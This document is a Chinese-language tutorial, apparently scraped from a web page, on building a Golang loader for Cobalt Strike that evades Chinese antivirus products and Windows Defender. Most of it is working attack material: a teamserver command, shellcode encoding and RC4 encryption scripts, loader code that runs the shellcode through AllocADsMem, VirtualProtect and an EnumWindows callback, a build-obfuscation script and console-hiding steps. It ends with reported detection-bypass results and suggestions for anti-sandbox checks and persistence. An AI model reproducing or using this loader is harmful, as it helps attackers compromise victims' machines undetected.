CS免杀Loader实现教程（过国内御三家及微步云查杀）<\/h1>

一、技术概述<\/h2>

本教程详细讲解如何实现一个基于Golang的CS（Cobalt Strike）免杀Loader，能够绕过国内主流杀毒软件（火绒、360、Defender）及微步云查杀。该Loader采用多种技术手段：<\/p>

RC4加密Shellcode<\/li>
非常规API调用（ActiveDS.dll）<\/li>
内存操作技巧<\/li>
黑框隐藏技术<\/li>

多参数编译混淆<\/li> <\/ul>

二、环境准备<\/h2>

1. CS版本选择<\/h3>

推荐使用以下版本：<\/p>

CS4.9（内存查杀绕过效果最佳）<\/li>
vShell（替代方案）<\/li>

不推荐CS4.5（火绒6.0对其内存查杀严格）<\/li> <\/ul>

2. 工具准备<\/h3>

SGN<\/strong>：Shellcode加密工具（https:\/\/github.com\/EgeBalci\/sgn）<\/li>
Go环境<\/strong>：1.18+版本<\/li>
EditBin<\/strong>：Visual Studio自带工具（用于隐藏黑框）<\/li>

Python环境<\/strong>：用于辅助脚本运行<\/li> <\/ul>
三、实现步骤<\/h2>
1. CS配置与启动<\/h3>
.\/teamserver 192.168.70.129 yawataa CS4.9-10010.profile <\/span><\/span><\/code><\/pre> 修改默认端口为1412（已去除特征）<\/li> 使用自定义profile文件<\/li> <\/ul> 2. Shellcode生成与处理<\/h3> 生成原始Shellcode<\/h4> 生成方式选择raw<\/code>二进制格式<\/li> 保存为payload_x64.bin<\/code><\/li> <\/ul> 使用SGN加密<\/h4> sgn -a 64<\/span> -c 1<\/span> -o pd.bin payload_x64.bin <\/span><\/span><\/code><\/pre>参数说明：<\/p> -a 64<\/code>：64位架构<\/li> -c 1<\/code>：加密轮数<\/li> -o pd.bin<\/code>：输出文件<\/li> <\/ul> Shellcode格式转换<\/h4> 使用de.py<\/code>脚本将二进制转换为Hex字符串：<\/p> def<\/span> read_binary_file<\/span>(file_path): <\/span><\/span> try<\/span>: <\/span><\/span> with<\/span> open(file_path, 'rb'<\/span>) as<\/span> file: <\/span><\/span> content =<\/span> file.<\/span>read() <\/span><\/span> hex_string =<\/span> ''<\/span>.<\/span>join(f<\/span>'<\/span>\\<\/span>x<\/span>{<\/span>byte:<\/span>02x<\/span>}<\/span>'<\/span> for<\/span> byte in<\/span> content) <\/span><\/span> print(hex_string) <\/span><\/span> except<\/span> Exception<\/span> as<\/span> e: <\/span><\/span> print(f<\/span>"Error: <\/span>{<\/span>e}<\/span>"<\/span>) <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> read_binary_file("pd.bin"<\/span>) <\/span><\/span><\/code><\/pre>RC4二次加密<\/h4> 使用rc4en.py<\/code>进行加密：<\/p> from<\/span> Crypto.Cipher import<\/span> ARC4 <\/span><\/span> <\/span><\/span>shellcode =<\/span> b<\/span>"your_sc"<\/span> <\/span><\/span>key =<\/span> b<\/span>'a3cb2tg1y!@#'<\/span> <\/span><\/span>cipher =<\/span> ARC4.<\/span>new(key) <\/span><\/span>encrypted =<\/span> cipher.<\/span>encrypt(shellcode) <\/span><\/span>hex_bytes =<\/span> [f<\/span>"0x<\/span>{<\/span>b:<\/span>02x<\/span>}<\/span>"<\/span> for<\/span> b in<\/span> encrypted] <\/span><\/span>go_code =<\/span> "var encryptedShellcode = []byte{"<\/span> +<\/span> ", "<\/span>.<\/span>join(hex_bytes) +<\/span> "}"<\/span> <\/span><\/span> <\/span><\/span>with<\/span> open('sc.txt'<\/span>, 'w'<\/span>, encoding=<\/span>'utf-8'<\/span>) as<\/span> f: <\/span><\/span> f.<\/span>write(go_code) <\/span><\/span><\/code><\/pre>3. Loader核心代码<\/h3> package<\/span> main<\/span> <\/span><\/span> <\/span><\/span>import<\/span> ( <\/span><\/span> "crypto\/rc4"<\/span> <\/span><\/span> "golang.org\/x\/sys\/windows"<\/span> <\/span><\/span> "syscall"<\/span> <\/span><\/span> "unsafe"<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span>func<\/span> main<\/span>() { <\/span><\/span> \/\/ 1.加载必要DLL <\/span><\/span><\/span><\/span> kernel32<\/span> :=<\/span> windows<\/span>.NewLazyDLL<\/span>("kernel32.dll"<\/span>) <\/span><\/span> Activeds<\/span> :=<\/span> syscall<\/span>.NewLazyDLL<\/span>("Activeds.dll"<\/span>) <\/span><\/span> User32<\/span> :=<\/span> windows<\/span>.NewLazyDLL<\/span>("User32.dll"<\/span>) <\/span><\/span> <\/span><\/span> \/\/ 2.获取API函数 <\/span><\/span><\/span><\/span> AllocADsMem<\/span> :=<\/span> Activeds<\/span>.NewProc<\/span>("AllocADsMem"<\/span>) <\/span><\/span> VirtualProtect<\/span> :=<\/span> kernel32<\/span>.NewProc<\/span>("VirtualProtect"<\/span>) <\/span><\/span> EnumWindows<\/span> :=<\/span> User32<\/span>.NewProc<\/span>("EnumWindows"<\/span>) <\/span><\/span> RtlCopyMemory<\/span> :=<\/span> kernel32<\/span>.NewProc<\/span>("RtlCopyMemory"<\/span>) <\/span><\/span> <\/span><\/span> \/\/ 3.RC4解密Shellcode <\/span><\/span><\/span><\/span> key<\/span> :=<\/span> []byte("a3cb2tg1y!@#"<\/span>) <\/span><\/span> sc<\/span> :=<\/span> []byte<\/span>{0x41<\/span>, 0x0b<\/span>,...<\/span>, 0xee<\/span>} \/\/ 替换为加密后的Shellcode <\/span><\/span><\/span><\/span> <\/span><\/span> cp<\/span>, _<\/span> :=<\/span> rc4<\/span>.NewCipher<\/span>(key<\/span>) <\/span><\/span> decrypted<\/span> :=<\/span> make([]byte<\/span>, len(sc<\/span>)) <\/span><\/span> cp<\/span>.XORKeyStream<\/span>(decrypted<\/span>, sc<\/span>) <\/span><\/span> <\/span><\/span> \/\/ 4.内存操作 <\/span><\/span><\/span><\/span> addr<\/span>, _<\/span>, _<\/span> :=<\/span> AllocADsMem<\/span>.Call<\/span>(uintptr(len(decrypted<\/span>))) <\/span><\/span> RtlCopyMemory<\/span>.Call<\/span>(addr<\/span>, (uintptr<\/span>)(unsafe<\/span>.Pointer<\/span>(&<\/span>decrypted<\/span>[0<\/span>])), uintptr(len(decrypted<\/span>))) <\/span><\/span> <\/span><\/span> \/\/ 5.修改内存属性 <\/span><\/span><\/span><\/span> oldProtect<\/span> :=<\/span> 0x40<\/span> <\/span><\/span> VirtualProtect<\/span>.Call<\/span>(addr<\/span>, uintptr(len(decrypted<\/span>)), 0x40<\/span>, uintptr(unsafe<\/span>.Pointer<\/span>(&<\/span>oldProtect<\/span>))) <\/span><\/span> <\/span><\/span> \/\/ 6.执行Shellcode <\/span><\/span><\/span><\/span> EnumWindows<\/span>.Call<\/span>(addr<\/span>, 0<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre>关键点说明：<\/p> 使用ActiveDS.dll<\/code>的AllocADsMem<\/code>而非VirtualAlloc<\/code>规避检测<\/li> 通过EnumWindows<\/code>回调执行Shellcode<\/li> RC4加密密钥硬编码为a3cb2tg1y!@#<\/code><\/li> 0x40<\/code>表示PAGE_EXECUTE_READWRITE权限<\/li> <\/ul> 4. 编译优化<\/h3> 多参数编译脚本<\/h4> package<\/span> main<\/span> <\/span><\/span> <\/span><\/span>import<\/span> ( <\/span><\/span> "flag"<\/span> <\/span><\/span> "math\/rand"<\/span> <\/span><\/span> "os\/exec"<\/span> <\/span><\/span> "time"<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span>var<\/span> buildConfigs<\/span> = [][]string<\/span>{ <\/span><\/span> {}, <\/span><\/span> {"-race"<\/span>}, <\/span><\/span> {"-trimpath"<\/span>}, <\/span><\/span> {"-ldflags"<\/span>, "-w"<\/span>}, <\/span><\/span> {"-ldflags"<\/span>, "-s"<\/span>}, <\/span><\/span> {"-ldflags"<\/span>, "-H=windowsgui"<\/span>}, <\/span><\/span> {"-ldflags"<\/span>, "-w -s"<\/span>}, <\/span><\/span> {"-trimpath"<\/span>, "-ldflags"<\/span>, "-w -s"<\/span>}, <\/span><\/span> {"-ldflags"<\/span>, "-w -s -H=windowsgui"<\/span>}, <\/span><\/span> {"-trimpath"<\/span>, "-ldflags"<\/span>, "-w -s -H=windowsgui"<\/span>}, <\/span><\/span>} <\/span><\/span> <\/span><\/span>func<\/span> main<\/span>() { <\/span><\/span> sourceFile<\/span> :=<\/span> flag<\/span>.String<\/span>("f"<\/span>, ""<\/span>, "Go source file"<\/span>) <\/span><\/span> flag<\/span>.Parse<\/span>() <\/span><\/span> <\/span><\/span> rand<\/span>.Seed<\/span>(time<\/span>.Now<\/span>().UnixNano<\/span>()) <\/span><\/span> for<\/span> _<\/span>, params<\/span> :=<\/span> range<\/span> buildConfigs<\/span> { <\/span><\/span> output<\/span> :=<\/span> randomName<\/span>() +<\/span> ".exe"<\/span> <\/span><\/span> args<\/span> :=<\/span> append([]string<\/span>{"build"<\/span>, "-o"<\/span>, output<\/span>}, append(params<\/span>, *<\/span>sourceFile<\/span>)...<\/span>) <\/span><\/span> exec<\/span>.Command<\/span>("go"<\/span>, args<\/span>...<\/span>).Run<\/span>() <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>func<\/span> randomName<\/span>() string<\/span> { <\/span><\/span> chars<\/span> :=<\/span> "yanami123456789"<\/span> <\/span><\/span> b<\/span> :=<\/span> make([]byte<\/span>, 8<\/span>) <\/span><\/span> for<\/span> i<\/span> :=<\/span> range<\/span> b<\/span> { <\/span><\/span> b<\/span>[i<\/span>] = chars<\/span>[rand<\/span>.Intn<\/span>(len(chars<\/span>))] <\/span><\/span> } <\/span><\/span> return<\/span> string(b<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre>黑框隐藏处理<\/h4> 使用editbin.exe<\/code>修改子系统：<\/p> editbin \/SUBSYSTEM:WINDOWS myapp.exe <\/span><\/span><\/code><\/pre>批量处理脚本：<\/p> package<\/span> main<\/span> <\/span><\/span> <\/span><\/span>import<\/span> ( <\/span><\/span> "os\/exec"<\/span> <\/span><\/span> "path\/filepath"<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span>func<\/span> main<\/span>() { <\/span><\/span> filepath<\/span>.Walk<\/span>(".\/result"<\/span>, func<\/span>(path<\/span> string<\/span>, info<\/span> os<\/span>.FileInfo<\/span>, err<\/span> error<\/span>) error<\/span> { <\/span><\/span> if<\/span> filepath<\/span>.Ext<\/span>(path<\/span>) ==<\/span> ".exe"<\/span> { <\/span><\/span> exec<\/span>.Command<\/span>("editbin"<\/span>, "\/SUBSYSTEM:WINDOWS"<\/span>, path<\/span>).Run<\/span>() <\/span><\/span> } <\/span><\/span> return<\/span> nil<\/span> <\/span><\/span> }) <\/span><\/span>} <\/span><\/span><\/code><\/pre>四、测试结果<\/h2> 火绒6.0<\/strong>：绕过内存查杀<\/li> 360安全卫士<\/strong>：显示"无风险"（测试10个样本存活1个）<\/li> Windows Defender<\/strong>：完全绕过<\/li> 微步云查杀<\/strong>：未检测到恶意行为<\/li> <\/ol> 五、注意事项<\/h2> 密钥a3cb2tg1y!@#<\/code>需要定期更换<\/li> 不同CS版本需测试内存查杀效果<\/li> 编译参数组合影响免杀效果，需多次尝试<\/li> EditBin需配置到PATH环境变量<\/li> 建议在虚拟机环境中测试<\/li> <\/ol> 六、进阶优化<\/h2> 可添加反沙箱检测逻辑<\/li> 实现流量加密规避网络检测<\/li> 加入持久化机制<\/li> 使用更复杂的加密算法替代RC4<\/li> <\/ol> 通过以上步骤，即可实现一个能够绕过国内主流杀软的CS Loader。实际效果可能因环境差异而不同，建议根据实际情况调整参数和加密方式。<\/p>